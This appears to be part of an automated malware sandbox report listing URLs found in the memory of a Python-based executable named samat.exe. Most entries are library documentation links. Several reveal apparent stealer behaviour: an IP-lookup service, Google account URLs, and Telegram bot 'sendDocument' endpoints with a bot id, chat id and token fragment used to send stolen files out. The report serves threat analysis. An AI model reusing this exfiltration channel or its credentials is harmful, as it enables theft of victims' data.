Source: samat.exe, 00000008.00000003.4520729290.000001BCCCAD5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550085157.000001BCCD43D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563798977.000001BCCD40E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.rfc-editor.org/info/rfc7253
Source: samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550085157.000001BCCD43D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
Source: samat.exe, 00000008.00000003.4523890696.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531671427.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502168541.000001BCCC995000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://wwwsearch.sf.net/):
Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard7
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.myip.com
Source: samat.exe, 00000008.00000002.4566260781.000001BCCDE80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.myip.com/
Source: samat.exe, 00000008.00000002.4566260781.000001BCCDE80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.myip.com/0
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: samat.exe, 00000008.00000002.4565677561.000001BCCDE58000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot8095725853/sendDocument
Source: samat.exe, 00000008.00000002.4565419860.000001BCCDC34000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot8095725853/sendDocument?chat_id=7027613045%3AAAGX3rPO-1UHB195if6JIXakjYP
Source: samat.exe, 00000008.00000002.4565419860.000001BCCDC34000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot8095725853/senddocument?chat_id=7027613045%3aaagx3rpo-1uhb195if6jixakjyp
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://blog.jaraco.com/skeleton
Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://bugs.python.org/issue44497.
Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: samat.exe, 00000008.00000003.4503586193.000001BCCC093000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513113910.000001BCCC0B6000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3018744804.000001BCCC3E4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3016877538.000001BCCC3E4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4509147637.000001BCCC094000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4512873377.000001BCCC09D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499785539.000001BCCC06D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502296671.000001BCCC070000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: samat.exe, 00000008.00000002.4556112760.000001BCCC200000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/howto/mro.html.
Source: samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
Source: samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
Source: samat.exe, 00000008.00000002.4554006263.000001BCCBE14000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
Source: samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
Source: samat.exe, 00000008.00000002.4554006263.000001BCCBE14000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
Source: samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
Source: samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
Source: samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
Source: samat.exe, 00000008.00000003.4551504232.000001BCCBFD3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554707107.000001BCCBFD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4538014733.000001BCCBFCE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4541657375.000001BCCBFD2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4535536595.000001BCCBFC2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/library/importlib.metadata.html
Source: samat.exe, 00000008.00000003.4500627948.000001BCCC7F0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4559133719.000001BCCC7F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/library/multiprocessing.html
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/reference/import.html#finders-and-loaders
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca
Source: samat.exe, 00000008.00000003.4511515721.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4519148634.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524896627.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500760862.000001BCCCA6C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526120054.000001BCCCA70000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531854842.000001BCCCA70000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561049803.000001BCCCA70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Ousret/charset_normalizer
Source: samat.exe, 00000008.00000003.4551504232.000001BCCBFD3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3003212092.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554707107.000001BCCBFD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4551021868.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4538014733.000001BCCBFCE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504500710.000001BCCBFDD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554916521.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505052664.000001BCCBFF5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4541657375.000001BCCBFD2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4535536595.000001BCCBFC2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3007180110.000001BCCBFDC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514197037.000001BCCBFF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/astral-sh/ruff
Source: samat.exe, 00000008.00000002.4561955068.000001BCCCD00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/jaraco/jaraco.functools/issues/5
Source: samat.exe, samat.exe, 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmp, samat.exe, 00000008.00000002.4572895965.00007FF8B7ECF000.00000002.00000001.01000000.00000031.sdmp String found in binary or memory: https://github.com/mhammond/pywin32
Source: samat.exe, 00000008.00000002.4562069346.000001BCCCE00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/platformdirs/platformdirs
Source: samat.exe, 00000008.00000002.4565219957.000001BCCDA30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/psf/requests/pull/6710
Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/pypa/.github/blob/main/CODE_OF_CONDUCT.md
Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/pypa/packaging
Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/pypa/packagingp
Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/pypa/setuptools/issues/1024.
Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/pypa/setuptools/issues/417#issuecomment-392298401
Source: samat.exe, 00000008.00000002.4562069346.000001BCCCE00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/pypa/setuptools/issues/new?template=distutils-deprecation.yml
Source: samat.exe, 00000008.00000002.4562069346.000001BCCCE00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/pypa/setuptools/issues/new?template=distutils-deprecation.yml0
Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/pypa/wheel
Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/pypa/wheel/issues
Source: samat.exe, 00000008.00000002.4554006263.000001BCCBE14000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: samat.exe, 00000008.00000003.4549329802.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4542418426.000001BCCBFFB000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504500710.000001BCCBFDD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505052664.000001BCCBFF5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3007180110.000001BCCBFDC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514197037.000001BCCBFF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554983007.000001BCCC000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de1
Source: samat.exe, 00000008.00000003.3003212092.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de11z
Source: samat.exe, 00000008.00000003.4514197037.000001BCCBFF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: samat.exe, 00000008.00000003.4551504232.000001BCCBFD3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4549329802.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3003212092.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554707107.000001BCCBFD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4551021868.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4538014733.000001BCCBFCE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4542418426.000001BCCBFFB000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504500710.000001BCCBFDD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554916521.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505052664.000001BCCBFF5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4541657375.000001BCCBFD2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4535536595.000001BCCBFC2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3007180110.000001BCCBFDC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514197037.000001BCCBFF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554983007.000001BCCC000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: samat.exe, 00000008.00000003.3021175651.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3018678721.000001BCCC7CF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4501044998.000001BCCC465000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024391863.000001BCCC374000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526403156.000001BCCC46C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4507302414.000001BCCC46A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504313591.000001BCCC469000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4498534466.000001BCCC431000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3018744804.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502404142.000001BCCC466000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4518851615.000001BCCC46A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4512558074.000001BCCC46A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3020091541.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/importlib_metadata
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/importlib_metadata/actions/workflows/main.yml/badge.svg
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/importlib_metadata/actions?query=workflow%3A%22tests%22
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/importlib_metadata/issues
Source: samat.exe, 00000008.00000002.4561716513.000001BCCCB00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
Source: samat.exe, 00000008.00000003.4551504232.000001BCCBFD3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3003212092.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554707107.000001BCCBFD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4551021868.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4538014733.000001BCCBFCE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504500710.000001BCCBFDD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554916521.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505052664.000001BCCBFF5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4541657375.000001BCCBFD2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4535536595.000001BCCBFC2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3007180110.000001BCCBFDC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514197037.000001BCCBFF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4560489792.000001BCCC97E000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/urllib3/urllib3/issues/292002
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/urllib3/urllib3/issues/32902
Source: samat.exe, 00000008.00000003.4511515721.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523890696.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4519148634.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524896627.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531671427.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500760862.000001BCCCA6C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513181603.000001BCCC7E8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4507086114.000001BCCC7C0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523746156.000001BCCC7E9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502168541.000001BCCC995000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: samat.exe, 00000008.00000003.4523890696.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531671427.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513181603.000001BCCC7E8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4507086114.000001BCCC7C0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523746156.000001BCCC7E9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502168541.000001BCCC995000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://google.com/mail
Source: samat.exe, 00000008.00000002.4559133719.000001BCCC7F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://google.com/mail/
Source: samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC834000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529948916.000001BCCC84F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529095803.000001BCCC843000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/
Source: samat.exe, 00000008.00000003.4501044998.000001BCCC465000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508966927.000001BCCC48A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4521773400.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCA76000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4520994875.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCA79000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4498534466.000001BCCC431000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4549013066.000001BCCC8AA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4511944713.000001BCCC492000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500352032.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCA79000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4538378339.000001BCCCAA1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4510392887.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/get
Source: samat.exe, 00000008.00000002.4559686522.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/post
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img.shields.io/badge/skeleton-2024-informational
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/charliermarsh/ruff/main/assets
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img.shields.io/pypi/pyversions/importlib_metadata.svg
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img.shields.io/pypi/v/importlib_metadata.svg
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://importlib-metadata.readthedocs.io/
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://importlib-metadata.readthedocs.io/en/latest/?badge=latest
Source: samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://json.org
Source: svchost.exe, 00000019.00000002.6314363798.0000022FAD702000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com:443/RST2.srf
